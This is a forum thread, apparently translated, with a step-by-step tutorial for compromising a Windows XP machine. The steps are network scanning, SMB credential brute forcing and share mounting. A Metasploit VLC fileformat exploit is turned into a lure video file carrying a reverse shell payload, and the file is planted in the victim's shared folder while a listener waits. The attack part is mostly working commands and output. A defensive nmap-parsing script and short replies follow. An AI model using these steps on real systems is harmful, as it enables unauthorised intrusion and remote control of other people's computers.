VLC Metasploit, making use of the shared-folder facility
#1
OK, back again with me, zee eichel, super handsome and anti-maho.. this time we're going to learn Metasploit against Windows XP SP3 with VLC media player installed. Why drag VLC into this? Because this attack is going to use the Metasploit exploit for VLC.

Target : Windows XP SP3 with VLC media player installed
Tested on BackTrack R2

First Step --#

Let's check which targets are alive.. in other words, whose PC is switched on

Code:
root@IBTeam:~# fping -g 192.168.1.32 192.168.1.34
192.168.1.33 is alive
192.168.1.34 is alive
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
192.168.1.32 is unreachable
root@IBTeam:~#

Second Step --#

The IP address 192.168.1.34 is my laptop (BackTrack), while 192.168.1.33 is my PC (Windows), and the one ending in 32 is the VirtualBox IP.. which I don't have up at the moment..
This is because I'm testing in my own room.. I've only ever done test runs, never put it into practice outside.. coz I'm not a hacker

OK, let's continue.. next we scan the target IP, in this case my PC on which I installed Windows XP SP3

Code:
root@IBTeam:~# nmap -sS -sV -f -n -O 192.168.1.33

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-05 14:35 WIT
Nmap scan report for 192.168.1.33
Host is up (0.00055s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
106/tcp  open  pop3pw       Mercury/32 poppass service
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
143/tcp  open  imap         Mercury/32 imapd 4.72
443/tcp  open  ssl/http     Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
3306/tcp open  mysql        MySQL (unauthorized)
MAC Address: 44:87:FC:56:86:85 (Elitegroup Computer System CO.)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: Host: localhost; OS: Windows

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.91 seconds
root@IBTeam:~#

OK, you can see there that the target matches.. and the port we need, 445, is indeed open

Third Step --#

Now, as promised in the title.. I'm going to make use of file sharing to do the injection..... let's find out the password, if there is one, using inguma.py

Code:
root@IBTeam:/pentest/exploits/inguma# ./inguma.py
WARNING: No route found for IPv6 destination :: (no default route?)
Inguma Version 0.2
Copyright (c) 2006-2008 Joxean Koret <[email protected]>
Copyright (c) 2009-2011 Hugo Teso <[email protected]>

No module named cx_Oracle
inguma> autoscan
Target host or network: 192.168.1.33
Brute force username and passwords (y/n)[n]: y
Automagically fuzz available targets (y/n)[n]: n
Print to filename (enter for stdout):
Inguma 'autoscan' report started at Thu May  5 14:40:12 2011
------------------------------------------------------------

TCP scanning target 192.168.1.33

Scanning port 17004 (418/418)
Open Ports
----------

Port 135/loc-srv is open
Port 3306/mysql is open
Port 139/netbios-ssn is open
Port 143/imap2 is open
Port 80/www is open
Port 445/microsoft-ds is open

MAC Address target 192.168.1.33

192.168.1.33 MAC: 44:87:fc:56:86:85 Unknow
Checking if is in promiscuous state target 192.168.1.33

Target 192.168.1.33 is promiscuous: False
Identifying services target 192.168.1.33

Port 80: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Port 135: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 139: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 445: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 3306: Unknow
Port 143: localhost IMAP4rev1 Mercury/32 v4.72 server
Checking what ports are nated target 192.168.1.33

isnated: global name 'IP' is not defined
Detecting operating system target 192.168.1.33

An error ocurred, may be user has not enough privileges or
Couldn't find nmap OS fingerprint DB at data/nmap-os-fingerprints
Gathering NetBIOS information target 192.168.1.33

NetBIOS Information
-------------------

IBTEAM-D7EA8C87  Workstation       44-87-FC-56-86-85 ACTIVE
MSHOME           Workstation       44-87-FC-56-86-85 ACTIVE  GROUP
IBTEAM-D7EA8C87  Server            44-87-FC-56-86-85 ACTIVE
MSHOME           Browser Server    44-87-FC-56-86-85 ACTIVE  GROUP
MSHOME           brother Browser    44-87-FC-56-86-85 ACTIVE
__MSBROWSE__     Unknown           44-87-FC-56-86-85 ACTIVE  GROUP

Is a brother Browser.
MAC Address: 44:87:FC:56:86:85 (Unknow)
Is a Windows based server.
Connecting to the CIFS server target 192.168.1.33

[+] Trying a NULL connection ...
[+] Ok. It works.
Current connection information
------------------------------

Domain name      : MSHOME
Lanman           : Windows 2000 LAN Manager
Server name      : IBTEAM-D7EA8C87
Operative System : Windows 5.1
Server Time      : Thu, 05 May 2011 07:41:35 GMT -7
Session Key      : 0

Is login required? True

Dumping RPC endpoints target 192.168.1.33

[+] Trying an anonymous connection ...

Gathered data
-------------

[+] Retrieving endpoint list from 192.168.1.33
[+] Trying protocol 80/HTTP...
[!] Protocol failed: HTTPTransport instance has no attribute '_HTTPTransport__socket'
[+] Trying protocol 445/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
[+] Trying protocol 135/TCP...
[!] Protocol failed: unpack requires a string argument of length 12
[+] Trying protocol 139/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
[+] Trying protocol 135/UDP...
[!] Protocol failed: timed out

No endpoints found.
Dumping SAM database target 192.168.1.33

[+] Trying an anonymous connection ...
[+] Retrieving endpoint list from 192.168.1.33
[+] Trying protocol 445/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
samrdump: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
Finding 'gold' anonymously in the CIFS shares target 192.168.1.33
Valid credentials *ARE* required for target 192.168.1.33
Use the following syntax prior to rerun the module:

user="username"
password="password"

Yep, that's done. The result is in the last two lines of the output there.....

4th Step --#

OK, let's keep going. The next step is to open the file-sharing connection so the share connects to our BackTrack box. Use the smbclient.py facility

Code:
root@IBTeam:~# cd /pentest/python/impacket-examples
root@IBTeam:/pentest/python/impacket-examples# ./smbclient.py
# open 192.168.1.33
exception! open() takes exactly 3 arguments (2 given)
# open 192.168.1.33 445
# login username
# shares
E$
tools_music
IPC$
print$
SharedDocs
Music
ADMIN$
C$
Printer

Now notice that the folders shared by the target PC have shown up: E$, tools_music, IPC$, print$, SharedDocs, Music, ADMIN$, C$, Printer. Once that's done, we of course have to mount it first so that later we can move over the backdoor file we'll create in the next step

5th Step --#

OK, now let's mount it... here I mount the tools_music folder....

Code:
root@IBTeam:~# smbmount //192.168.1.33/tools_music /inject/
mount error: can not change directory into mount target /inject/
root@IBTeam:~# smbmount //192.168.1.33/tools_music /media/
Password:
root@IBTeam:~# cd /media.
bash: cd: /media.: No such file or directory
root@IBTeam:~# cd /media/
root@IBTeam:/media# ls
K-Lite_Codec_Pack_700_Mega.exe  vlc-1.1.9-win32.exe
root@IBTeam:/media#

w0w, the directory contents turn out to include a VLC installer.. from that we can assume the target PC's owner has installed VLC on their computer....next, bro....

6th Step --#

Now it's time to create the backdoor file.....open the Metasploit console

Code:
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 326 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11626 updated 103 days ago (2011.01.22)

Warning: This copy of the Metasploit Framework was last updated 103 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/fileformat/videolan_tivo
msf exploit(videolan_tivo) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(videolan_tivo) > set FILENAME bokep_panas.avi
FILENAME => bokep_panas.avi
msf exploit(videolan_tivo) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(videolan_tivo) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(videolan_tivo) > exploit

[*] Creating 'bokep_panas.avi' file ...
[*] Generated output file /root/bokep_panas.avi
msf exploit(videolan_tivo) > show options

Module options (exploit/windows/fileformat/videolan_tivo):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FILENAME    bokep_panas.avi  yes       The file name.
   OUTPUTPATH  /root/           yes       The location of the file.

Done! We've successfully created the VLC backdoor file, saved in the root directory

Now we just need to activate the finishing move


Code:
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 326 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11626 updated 103 days ago (2011.01.22)

Warning: This copy of the Metasploit Framework was last updated 103 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_TCP
[-] The value specified for PAYLOAD is not valid.
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     192.168.1.34     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.34:4444
[*] Starting the payload handler...

Last Step --#

We just move the backdoor file I named bokep_panas.avi earlier into the victim's directory... then wait for the victim to execute it.... when will it get clicked? kwokwokw, just pray

Code:
root@IBTeam:~# mv bokep_panas.avi /media/tools_music
root@IBTeam:~# cd /media/
root@IBTeam:/media# ls
K-Lite_Codec_Pack_700_Mega.exe  vlc-1.1.9-win32.exe bokep_panas.avi
root@IBTeam:/media#

If it succeeds you'll get shell access
Thanks to my friend sickness, moderator of the backtrack.org forum, for this tutorial.....
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
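As an added defender-side example (not from the post, nor from Inguma or Metasploit), here is a small Python parser for the nmap output format shown in the second step. It flags hosts that expose SMB on an end-of-life Windows XP fingerprint, which is the combination this walkthrough relies on; the sample input is constructed from the post's scan.

```python
import re

# Constructed sample modelled on the nmap -sS -sV -O output in the post above.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.1.33
Host is up (0.00055s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
3306/tcp open  mysql        MySQL (unauthorized)
MAC Address: 44:87:FC:56:86:85 (Elitegroup Computer System CO.)
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
OS_RE = re.compile(r"^OS details: (.*)$")
# port/proto  state  service  [version...]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# OS families long out of vendor support; a fingerprint mentioning any of them is a finding.
EOL_OS_MARKERS = ("Windows XP", "Windows 2000", "Windows Server 2003")


def parse_nmap(text):
    """Return {"host", "os", "ports": [(port, proto, state, service, version), ...]}."""
    report = {"host": None, "os": "", "ports": []}
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            report["host"] = m.group(1)
        elif m := OS_RE.match(line):
            report["os"] = m.group(1)
        elif m := PORT_RE.match(line):
            port, proto, state, service, version = m.groups()
            report["ports"].append((int(port), proto, state, service, version or ""))
    return report


def smb_exposure_findings(report):
    """Risk findings: SMB reachable, EOL OS fingerprint, and the combination of both."""
    findings = []
    open_ports = {p for p, _, state, _, _ in report["ports"] if state == "open"}
    smb_ports = sorted(open_ports & {139, 445})
    if smb_ports:
        findings.append("SMB reachable on port(s) %s" % ", ".join(map(str, smb_ports)))
    # Service banners (e.g. "Microsoft Windows XP microsoft-ds") also carry OS hints.
    os_text = report["os"] + " " + " ".join(v for *_, v in report["ports"])
    eol = [marker for marker in EOL_OS_MARKERS if marker in os_text]
    if eol:
        findings.append("end-of-life OS fingerprint: " + ", ".join(eol))
    if smb_ports and eol:
        findings.append("HIGH: SMB shares on unsupported OS; audit share ACLs and guest access")
    return findings


if __name__ == "__main__":
    rep = parse_nmap(SAMPLE_NMAP)
    for finding in smb_exposure_findings(rep):
        print(rep["host"], "-", finding)
```

Run against saved nmap text (not XML) from an inventory scan, it lists the hosts whose share configuration deserves a look before anything else on this page could be attempted against them.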

#2
Keep it up, Mr Zee, I like Metasploit, I'm waiting for your next tutorial

Mr Zee, a suggestion if possible: after writing something like the above, also upload the tutorial so we can just download it..
with this format it has to be moved into Office first and then turned into a PDF, if Mr Zee doesn't mind

#3
please post this video

#4
(07-03-2011, 12:36 AM)R-12 Wrote: Keep it up, Mr Zee, I like Metasploit, I'm waiting for your next tutorial

Mr Zee, a suggestion if possible: after writing something like the above, also upload the tutorial so we can just download it..
with this format it has to be moved into Office first and then turned into a PDF, if Mr Zee doesn't mind

Yeah, most of that gets discussed over at ASWB, bro

(07-20-2011, 12:29 AM)surendradhaka Wrote: please post this video

Sorry, I don't have much time

Btw, this thread is already an old trick ... check the date, yeah :d